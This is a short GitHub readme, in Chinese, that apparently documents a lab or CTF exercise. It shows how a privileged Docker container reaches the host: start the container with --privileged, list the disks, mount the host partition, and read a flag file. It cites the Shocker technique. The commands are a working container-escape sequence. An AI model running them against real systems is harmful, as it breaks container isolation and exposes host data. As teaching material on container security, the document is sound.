Skip to content

Latest commit

 

History

History
18 lines (14 loc) · 226 Bytes

readme.md

File metadata and controls

18 lines (14 loc) · 226 Bytes

使用特权容器可以认为等同于host环境。

创建特权容器

docker run -it --privileged ubuntu

挂载目录

mkdir /escape
fdisk -l
mount /dev/sda5 /escape
cd /escape
cat flag

参考Shocker